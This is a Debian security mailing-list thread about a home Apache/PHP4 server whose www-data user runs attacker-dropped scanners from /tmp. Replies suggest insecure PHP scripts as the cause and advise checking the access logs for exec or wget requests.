[Date Prev][Date Next] [Thread Prev][Thread Next] [Date Index] [Thread Index]

Re: security issues with apache!

This one time, at band camp, Josep Serrano said:
> Hello Petter
> We still don't know for what do you use your apache. Most of the problems come from
> poor PHP scripts. What scripts/services are you running in this server?

I strongly suggest this as the source of your problems.  In my
experience, php apps do not take the care to sanitize input before
executing it.  Look in your access logs for exec commands or wget
commands.  Figure out which script was attacked, and fix or disable it.

> > Hi
> >
> > I'm not completely new to Debian or Linux, but I wouldn't classify
> > myself as a battlescarred sysadmin just yet :)
> >
> > Anyways. My problem is security-related, and I hope that I'm posting to
> > the correct list as well as hoping that someone can help me out here.
> >
> > Recently I've noticed that my Apache-installation gets violated and that
> > an intruder somehow manages to put stuff in /tmp and /var/tmp. Then it
> > makes Apache execute these. Unfortunately these are some rather nasty
> > things, mostly portscanners and bruteforce-attacks. They are all easily
> > detected with netstat, and at least once a day I have to go in and kill
> > the processes spawned by www-data (the user that runs Apache) as well as
> > delete the offending files.
> >
> > Now, like I said - I'm not a pro, I'm trying to learn by doing.
> > Unfortunately how this happens is way over my experience, and now I
> > could really use some help in fixing this leak. I've narrowed it down to
> > Apache only, but I have no clue as to how to seal the leak. I'm running
> > a small server in my home using (mostly) Debian Sarge. This is a real
> > Frankenstein-machine as it was originally a Woody-box, but it's been
> > upgraded with bits from all over. It's been running pretty much
> > constantly for three years. Of course I apply security fixes when they
> > arrive, but I don't know if the source of these intrusions is Apache or
> > just that I have managed to fubar some setting somewhere, allowing an
> > attacker to make Apache execute code.
> >
> > Essentially the machine is Debian Sarge, with MySQL and PHP4. There are
> > other services running on it, but I've noticed that the
> > intrusions/code-executions only happen through Apache. MySQL only
> > listens on localhost and accepts no connections from the outside. Hence,
> > I hope that this is limited to Apache. Apache is 1.3.x, MySQL 4.0.24 and
> > PHP 4.3
> >
> > I deeply appreciate any help that can make me seal this leak! Thank you
> > all in advance!
> >
> > /petter senften
> >
> -- 
> To UNSUBSCRIBE, email to debian-security-REQUEST@lists.debian.org
> with a subject of "unsubscribe". Trouble? Contact listmaster@lists.debian.org

|   ,''`.                                            Stephen Gran |
|  : :' :                                        sgran@debian.org |
|  `. `'                        Debian user, admin, and developer |
|    `-                                     http://www.debian.org |

Attachment: signature.asc
Description: Digital signature

Reply to: